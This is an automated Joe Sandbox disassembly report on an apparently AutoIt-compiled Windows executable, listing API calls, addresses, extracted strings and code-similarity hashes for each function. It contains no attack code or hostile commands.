                                                                      • API ID: __wcsicoll$__wcsnicmp
                                                                      • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:$pQH
                                                                      • API String ID: 790654849-32604322
                                                                      • Opcode ID: 29d435e902b015a153743909057decd258383f7606cc46ad0233eead686698a2
                                                                      • Instruction ID: c91e69f26a1c2718e03151092e39642ccf44f92bf630fd0466772f198d10bc2a
                                                                      • Opcode Fuzzy Hash: 29d435e902b015a153743909057decd258383f7606cc46ad0233eead686698a2
                                                                      • Instruction Fuzzy Hash: CA317731A0420966DB10FAA2DD46BAE736C9F15315F20053BBD00BB2D5E7BC6E4587AE
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 37a5c787a7b2188dc8d5479775b41731b0c96863aaa01ab20318fba061c3c2a8
                                                                      • Instruction ID: 62dae473257cc2caee0a49c5626d46440081d624880130feb25903cd50123649
                                                                      • Opcode Fuzzy Hash: 37a5c787a7b2188dc8d5479775b41731b0c96863aaa01ab20318fba061c3c2a8
                                                                      • Instruction Fuzzy Hash: 84C128727002046BE724CFA8DC46FAFB7A4EF55311F00416AFA05DA2C1EBB99909C795
                                                                      APIs
                                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 004487BD
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: Window
                                                                      • String ID: 0
                                                                      • API String ID: 2353593579-4108050209
                                                                      • Opcode ID: b0df0e29545e706fc7615ccb9c436c62dbee4145767baabea16aca18bd76baa2
                                                                      • Instruction ID: 06508bea8339de1511a48146ac1d08a96458f0089f80555ee302a354f7131a6f
                                                                      • Opcode Fuzzy Hash: b0df0e29545e706fc7615ccb9c436c62dbee4145767baabea16aca18bd76baa2
                                                                      • Instruction Fuzzy Hash: 35B18BB0204341ABF324CF24CC89BABBBE4FB89744F14491EF591962D1DBB8A845CB59
                                                                      APIs
                                                                      • GetSysColor.USER32(0000000F), ref: 0044A05E
                                                                      • GetClientRect.USER32(?,?), ref: 0044A0D1
                                                                      • SendMessageW.USER32(?,00001328,00000000,?), ref: 0044A0E9
                                                                      • GetWindowDC.USER32(?), ref: 0044A0F6
                                                                      • GetPixel.GDI32(00000000,?,?), ref: 0044A108
                                                                      • ReleaseDC.USER32(?,?), ref: 0044A11B
                                                                      • GetSysColor.USER32(0000000F), ref: 0044A131
                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 0044A140
                                                                      • GetSysColor.USER32(0000000F), ref: 0044A14F
                                                                      • GetSysColor.USER32(00000005), ref: 0044A15B
                                                                      • GetWindowDC.USER32(?), ref: 0044A1BE
                                                                      • GetPixel.GDI32(00000000,00000000,00000000), ref: 0044A1CB
                                                                      • GetPixel.GDI32(00000000,?,00000000), ref: 0044A1E4
                                                                      • GetPixel.GDI32(00000000,00000000,?), ref: 0044A1FD
                                                                      • GetPixel.GDI32(00000000,?,?), ref: 0044A21D
                                                                      • ReleaseDC.USER32(?,00000000), ref: 0044A229
                                                                      • SetBkColor.GDI32(?,00000000), ref: 0044A24C
                                                                      • GetSysColor.USER32(00000008), ref: 0044A265
                                                                      • SetTextColor.GDI32(?,00000000), ref: 0044A270
                                                                      • SetBkMode.GDI32(?,00000001), ref: 0044A282
                                                                      • GetStockObject.GDI32(00000005), ref: 0044A28A
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: Color$Pixel$Window$Release$ClientLongMessageModeObjectRectSendStockText
                                                                      • String ID:
                                                                      • API String ID: 1744303182-0
                                                                      • Opcode ID: e73dd003506282a75ec33c48a00615cd632731ac0e25c139f5641f86d6275693
                                                                      • Instruction ID: 0380b5c53d8a23173c1b90063483f03488caaf4f58ae5d2001aea5c06c56dff4
                                                                      • Opcode Fuzzy Hash: e73dd003506282a75ec33c48a00615cd632731ac0e25c139f5641f86d6275693
                                                                      • Instruction Fuzzy Hash: E6612531140101ABE7109F78CC88BAB7764FB46320F14876AFD659B3D0DBB49C529BAA
                                                                      APIs
                                                                      • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,004164DE), ref: 00417C28
                                                                      • __mtterm.LIBCMT ref: 00417C34
                                                                        • Part of subcall function 004178FF: TlsFree.KERNEL32(00000017,00417D96,?,004164DE), ref: 0041792A
                                                                        • Part of subcall function 004178FF: DeleteCriticalSection.KERNEL32(00000000,00000000,00410E44,?,00417D96,?,004164DE), ref: 004181B8
                                                                        • Part of subcall function 004178FF: _free.LIBCMT ref: 004181BB
                                                                        • Part of subcall function 004178FF: DeleteCriticalSection.KERNEL32(00000017,00410E44,?,00417D96,?,004164DE), ref: 004181E2
                                                                      • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00417C4A
                                                                      • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00417C57
                                                                      • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00417C64
                                                                      • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00417C71
                                                                      • TlsAlloc.KERNEL32(?,004164DE), ref: 00417CC1
                                                                      • TlsSetValue.KERNEL32(00000000,?,004164DE), ref: 00417CDC
                                                                      • __init_pointers.LIBCMT ref: 00417CE6
                                                                      • __calloc_crt.LIBCMT ref: 00417D54
                                                                      • GetCurrentThreadId.KERNEL32 ref: 00417D80
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: AddressProc$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm_free
                                                                      • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                                                      • API String ID: 4163708885-3819984048
                                                                      • Opcode ID: b664ad2f65df639e4a6a12b7ff6e2ff430dd15d20f416fce335d42a987fa1153
                                                                      • Instruction ID: ca22d9d2e1075830452d52834408fe47c465c3b6ac2468b12672dd77d4d5938c
                                                                      • Opcode Fuzzy Hash: b664ad2f65df639e4a6a12b7ff6e2ff430dd15d20f416fce335d42a987fa1153
                                                                      • Instruction Fuzzy Hash: D5315A75808710DECB10AF75BD0865A3EB8BB60764B12093FE914932B0DB7D8881CF9C
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: >>>AUTOIT SCRIPT<<<$\
                                                                      • API String ID: 0-1896584978
                                                                      • Opcode ID: 0f644335f765ba1f090fa429f6a047d8548bdb555fde32e118ce45ae114b4fa6
                                                                      • Instruction ID: daa296ce3da71eb1ea4b2d74bac6de3536c6b190185545f0361092b1072d42a3
                                                                      • Opcode Fuzzy Hash: 0f644335f765ba1f090fa429f6a047d8548bdb555fde32e118ce45ae114b4fa6
                                                                      • Instruction Fuzzy Hash: 4081B9B1900204ABCB20EB61CD85FDB73ED9F54304F40859EF505AB142EA39EA85CB99
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: __wcsicoll$IconLoad
                                                                      • String ID: blank$info$question$stop$warning
                                                                      • API String ID: 2485277191-404129466
                                                                      • Opcode ID: 90066845996854fde84de619c40f1fe09919dc61d56db525c82daa747bae1459
                                                                      • Instruction ID: a4c8356a5cb7371e963c7ba7671977edd7eb5cf64b0a9c0e84f2fcb3e6131cad
                                                                      • Opcode Fuzzy Hash: 90066845996854fde84de619c40f1fe09919dc61d56db525c82daa747bae1459
                                                                      • Instruction Fuzzy Hash: 9121A732B4021566DB00AB65BC05FEF3358DB98762F040837FA05E2282E3A9A52093BD
                                                                      APIs
                                                                      • LoadIconW.USER32(?,00000063), ref: 0045464C
                                                                      • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 0045465E
                                                                      • SetWindowTextW.USER32(?,?), ref: 00454678
                                                                      • GetDlgItem.USER32(?,000003EA), ref: 00454690
                                                                      • SetWindowTextW.USER32(00000000,?), ref: 00454697
                                                                      • GetDlgItem.USER32(?,000003E9), ref: 004546A8
                                                                      • SetWindowTextW.USER32(00000000,?), ref: 004546AF
                                                                      • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 004546D1
                                                                      • SendDlgItemMessageW.USER32(?,000003E9,000000C5,?,00000000), ref: 004546EB
                                                                      • GetWindowRect.USER32(?,?), ref: 004546F5
                                                                      • SetWindowTextW.USER32(?,?), ref: 00454765
                                                                      • GetDesktopWindow.USER32 ref: 0045476F
                                                                      • GetWindowRect.USER32(00000000), ref: 00454776
                                                                      • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 004547C4
                                                                      • GetClientRect.USER32(?,?), ref: 004547D2
                                                                      • PostMessageW.USER32(?,00000005,00000000,00000080), ref: 004547FC
                                                                      • SetTimer.USER32(?,0000040A,?,00000000), ref: 0045483F
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                                      • String ID:
                                                                      • API String ID: 3869813825-0
                                                                      • Opcode ID: 7299b5a8a54a0497ad48b5c2470d2d1877852c465202323cb5b3bdfcc53dc08d
                                                                      • Instruction ID: 23cbb84c7db07f79204f7fb68ef1a354279dd66d41dce19f663d7a5246859b32
                                                                      • Opcode Fuzzy Hash: 7299b5a8a54a0497ad48b5c2470d2d1877852c465202323cb5b3bdfcc53dc08d
                                                                      • Instruction Fuzzy Hash: 06619D75A00705ABD720DFA8CE89F6FB7F8AB48705F00491DEA46A7290D778E944CB54
                                                                      APIs
                                                                      • _wcslen.LIBCMT ref: 00464B28
                                                                      • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00464B38
                                                                      • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00464B60
                                                                      • _wcslen.LIBCMT ref: 00464C28
                                                                      • GetCurrentDirectoryW.KERNEL32(00000000,00000000,?), ref: 00464C3C
                                                                      • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00464C64
                                                                      • _wcslen.LIBCMT ref: 00464CBA
                                                                      • _wcslen.LIBCMT ref: 00464CD0
                                                                      • _wcslen.LIBCMT ref: 00464CEF
                                                                      Strings
                                                                      Similarity
                                                                      • API ID: _wcslen$Directory$CurrentSystem
                                                                      • String ID: D
                                                                      • API String ID: 1914653954-2746444292
                                                                      • Opcode ID: 0d94b415f8f4be32da9437a4562fd2ea9250d6af123b13f45aceadf0defadff8
                                                                      • Instruction ID: cb0983c86ca1fa87ccea60adda1cf5635047c5df12380c224dcb23d097980814
                                                                      • Opcode Fuzzy Hash: 0d94b415f8f4be32da9437a4562fd2ea9250d6af123b13f45aceadf0defadff8
                                                                      • Instruction Fuzzy Hash: 98E101716043409BD710EF65C845B6BB7E4AFC4308F148D2EF98987392EB39E945CB9A
                                                                      APIs
                                                                      • _wcsncpy.LIBCMT ref: 0045CE39
                                                                      • __wsplitpath.LIBCMT ref: 0045CE78
                                                                      • _wcscat.LIBCMT ref: 0045CE8B
                                                                      • _wcscat.LIBCMT ref: 0045CE9E
                                                                      • GetCurrentDirectoryW.KERNEL32(00000104,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CEB2
                                                                      • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,00000104,?), ref: 0045CEC5
                                                                        • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                                                                      • GetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF05
                                                                      • SetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF1D
                                                                      • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF2E
                                                                      • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF3F
                                                                      • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF53
                                                                      • _wcscpy.LIBCMT ref: 0045CF61
                                                                      • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CFA4
                                                                      Strings
                                                                      Similarity
                                                                      • API ID: CurrentDirectory$AttributesFile$_wcscat$__wsplitpath_wcscpy_wcsncpy
                                                                      • String ID: *.*
                                                                      • API String ID: 1153243558-438819550
                                                                      • Opcode ID: 28b8a1e182566b38844f77773a79acdc9f60bea9bca2776be04cde59cc8a5d2f
                                                                      • Instruction ID: eacc2f87ca0c49a88fd160cf35c0ab61f7b8ac52d7ffc0430f804bda47b2a69a
                                                                      • Opcode Fuzzy Hash: 28b8a1e182566b38844f77773a79acdc9f60bea9bca2776be04cde59cc8a5d2f
                                                                      • Instruction Fuzzy Hash: F071D572900208AEDB24DB54CCC5AEEB7B5AB44305F1489ABE805D7242D67C9ECDCB99
                                                                      APIs
                                                                      Strings
                                                                      Similarity
                                                                      • API ID: __wcsicoll
                                                                      • String ID: LEFT$MAIN$MENU$MIDDLE$PRIMARY$RIGHT$SECONDARY
                                                                      • API String ID: 3832890014-4202584635
                                                                      • Opcode ID: 95885f1eddacfd63033607ac838e89683eff4e7941016429c0898dbf95f86d61
                                                                      • Instruction ID: 3b59ed03df0c76d23b576b9f0bbd6b5c96606bf3e4c0b80e5c93e428ec3f30be
                                                                      • Opcode Fuzzy Hash: 95885f1eddacfd63033607ac838e89683eff4e7941016429c0898dbf95f86d61
                                                                      • Instruction Fuzzy Hash: AB117772A4422512E91072657C03BFF219CCF1177AF14487BF90DE5A82FB4EDA9541ED
                                                                      APIs
                                                                      • PostMessageW.USER32(?,00000112,0000F060,00000000), ref: 0046A0C9
                                                                      • GetFocus.USER32 ref: 0046A0DD
                                                                      • GetDlgCtrlID.USER32(00000000), ref: 0046A0E8
                                                                      • PostMessageW.USER32(?,00000111,?,00000000), ref: 0046A13C
                                                                      Strings
                                                                      Similarity
                                                                      • API ID: MessagePost$CtrlFocus
                                                                      • String ID: 0
                                                                      • API String ID: 1534620443-4108050209
                                                                      • Opcode ID: 5cb98421042f455ec4000b61dd51e58b9a21b7b09c176f3470d706b88b7d88ce
                                                                      • Instruction ID: bf3f5449e9a8ba554bb586fd0597798874618ae7c394ba8af81d11134a55f14d
                                                                      • Opcode Fuzzy Hash: 5cb98421042f455ec4000b61dd51e58b9a21b7b09c176f3470d706b88b7d88ce
                                                                      • Instruction Fuzzy Hash: 9791AD71604711AFE710CF14D884BABB7A4FB85314F004A1EF991A7381E7B9D895CBAB
                                                                      APIs
                                                                      • DestroyWindow.USER32(?), ref: 004558E3
                                                                      • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00400000,00000000), ref: 0045592C
                                                                      Strings
                                                                      Similarity
                                                                      • API ID: Window$CreateDestroy
                                                                      • String ID: ,$tooltips_class32
                                                                      • API String ID: 1109047481-3856767331
                                                                      • Opcode ID: ae2d9903759a545ce0c494cdefa096f9672d9422e9f4a365a31b4f6ccc33a5ca
                                                                      • Instruction ID: 3e2a402d8ef05c983ab6a33f0f0d51d253aadf8c8a2d9d50fdabec1795fb524a
                                                                      • Opcode Fuzzy Hash: ae2d9903759a545ce0c494cdefa096f9672d9422e9f4a365a31b4f6ccc33a5ca
                                                                      • Instruction Fuzzy Hash: AE71AD71650208AFE720CF58DC84FBA77B8FB59310F20851AFD45AB391DA74AD46CB98
                                                                      APIs
                                                                      • GetMenuItemInfoW.USER32(?,00000007,00000000,00000030), ref: 00468BB1
                                                                      • GetMenuItemCount.USER32(?), ref: 00468C45
                                                                      • DeleteMenu.USER32(?,00000005,00000000,?,?,?), ref: 00468CD9
                                                                      • DeleteMenu.USER32(?,00000004,00000000,?,?), ref: 00468CE2
                                                                      • DeleteMenu.USER32(00000000,00000006,00000000,?,00000004,00000000,?,?), ref: 00468CEB
                                                                      • DeleteMenu.USER32(?,00000003,00000000,?,00000004,00000000,?,?), ref: 00468CF4
                                                                      • GetMenuItemCount.USER32 ref: 00468CFD
                                                                      • SetMenuItemInfoW.USER32(?,00000004,00000000,00000030), ref: 00468D35
                                                                      • GetCursorPos.USER32(?), ref: 00468D3F
                                                                      • SetForegroundWindow.USER32(?), ref: 00468D49
                                                                      • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,?,00000003,00000000,?,00000004,00000000,?,?), ref: 00468D5F
                                                                      • PostMessageW.USER32(?,00000000,00000000,00000000), ref: 00468D6C
                                                                      Strings
                                                                      Similarity
                                                                      • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow
                                                                      • String ID: 0
                                                                      • API String ID: 1441871840-4108050209
                                                                      • Opcode ID: 12c28d3332ad221b92e3a636ba418a85e822d4b5186b1920d2f56c44304fb3db
                                                                      • Instruction ID: 6d2915cdebcc0779354c8c01805c07fba6dcd836026253be2713676dcba25ca6
                                                                      • Opcode Fuzzy Hash: 12c28d3332ad221b92e3a636ba418a85e822d4b5186b1920d2f56c44304fb3db
                                                                      • Instruction Fuzzy Hash: F571A0B0644300BBE720DB58CC45F5AB7A4AF85724F20470EF5656B3D1DBB8B8448B2A
                                                                      APIs
                                                                      • GetModuleHandleW.KERNEL32(00000000,00000066,?,00000FFF,00000010,00000001,?,?,00427F75,?,0000138C,?,00000001,?,?,?), ref: 004608A9
                                                                      • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608B0
                                                                        • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                        • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                      • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,00427F75,?,0000138C,?,00000001,?,?,?,?,?,00000000), ref: 004608D0
                                                                      • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608D7
                                                                      • __swprintf.LIBCMT ref: 00460915
                                                                      • __swprintf.LIBCMT ref: 0046092D
                                                                      • _wprintf.LIBCMT ref: 004609E1
                                                                      • MessageBoxW.USER32(00000000,?,?,00011010), ref: 004609FA
                                                                      Strings
                                                                      Similarity
                                                                      • API ID: HandleLoadModuleString__swprintf$Message_memmove_wcslen_wprintf
                                                                      • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                      • API String ID: 3631882475-2268648507
                                                                      • Opcode ID: 34748020dcaf007b6c88f6c4c4dd7bf7ecfb2d58ebabdf7d9dae9be74c8fa7b1
                                                                      • Instruction ID: 03c51728676f919c2e33c8c13cfd5c1cee97c3d48cab2dbcdd3400b30208eb52
                                                                      • Opcode Fuzzy Hash: 34748020dcaf007b6c88f6c4c4dd7bf7ecfb2d58ebabdf7d9dae9be74c8fa7b1
                                                                      • Instruction Fuzzy Hash: F5416071900209ABDB00FB91CD46AEF7778AF44314F44447AF50577192EA786E45CBA9
                                                                      APIs
                                                                      • ExtractIconExW.SHELL32(?,?,?,?,00000001), ref: 004716C7
                                                                      • ExtractIconExW.SHELL32(?,000000FF,?,?,00000001), ref: 004716E1
                                                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00471711
                                                                      • SendMessageW.USER32 ref: 00471740
                                                                      • ImageList_Create.COMCTL32(00000010,00000010,00000021,?,00000001,?,?,?,?,?,?,?,?,?,?,00001053), ref: 00471779
                                                                      • SendMessageW.USER32(?,00001003,00000001,00000000), ref: 0047179A
                                                                      • ImageList_Create.COMCTL32(00000020,00000020,00000021,00000000,00000001,?,?,?,?,?,?,?,?,?,?,00001053), ref: 004717B0
                                                                      • SendMessageW.USER32(?,00001003,00000000,00000000), ref: 004717D3
                                                                      • ImageList_ReplaceIcon.COMCTL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 004717F8
                                                                      • ImageList_ReplaceIcon.COMCTL32(00000000,000000FF,?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 00471807
                                                                      • SendMessageW.USER32 ref: 0047184F
                                                                      • SendMessageW.USER32(?,0000104C,00000000,00000002), ref: 00471872
                                                                      • SendMessageW.USER32(?,00001015,00000000,00000000), ref: 00471890
                                                                      • DestroyIcon.USER32(?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 0047189C
                                                                      • DestroyIcon.USER32(?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 004718A2
                                                                      Similarity
                                                                      • API ID: MessageSend$Icon$ImageList_$CreateDestroyExtractReplace
                                                                      • String ID:
                                                                      • API String ID: 4116747274-0
                                                                      APIs
                                                                      • GetMenuItemInfoW.USER32(?,FFFFFFFF,00000000,00000030), ref: 0045FDDB
                                                                      • SetMenuItemInfoW.USER32(00000008,00000004,00000000,00000030), ref: 0045FE14
                                                                      • Sleep.KERNEL32(000001F4,?,FFFFFFFF,00000000,00000030,?,?,?,?,?,?), ref: 0045FE26
                                                                      Similarity
                                                                      • API ID: InfoItemMenu$Sleep
                                                                      • String ID: 0
                                                                      • API String ID: 1196289194-4108050209
                                                                      APIs
                                                                      • GetDC.USER32(00000000), ref: 0043143E
                                                                      • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 0043144F
                                                                      • CreateCompatibleDC.GDI32(00000000), ref: 00431459
                                                                      • SelectObject.GDI32(00000000,?), ref: 00431466
                                                                      • StretchBlt.GDI32(00000000,00000000,00000000,?,?,?,?,?,?,?,00CC0020), ref: 004314CC
                                                                      • GetDIBits.GDI32(00000000,?,00000000,00000000,00000000,?,00000000), ref: 00431505
                                                                      Similarity
                                                                      • API ID: CompatibleCreate$BitmapBitsObjectSelectStretch
                                                                      • String ID: (
                                                                      • API String ID: 3300687185-3887548279
                                                                      APIs
                                                                        • Part of subcall function 004536F7: CharLowerBuffW.USER32(?,?), ref: 0045370C
                                                                        • Part of subcall function 00445AE0: _wcslen.LIBCMT ref: 00445AF0
                                                                      • GetDriveTypeW.KERNEL32 ref: 0045DB32
                                                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DB78
                                                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DBB3
                                                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DBED
                                                                        • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                        • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                      Similarity
                                                                      • API ID: SendString$_wcslen$BuffCharDriveLowerType_memmove
                                                                      • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                      • API String ID: 1976180769-4113822522
                                                                      APIs
                                                                      Similarity
                                                                      • API ID: _wcslen$_wcsncpy$LocalTime__fassign
                                                                      • String ID:
                                                                      • API String ID: 461458858-0
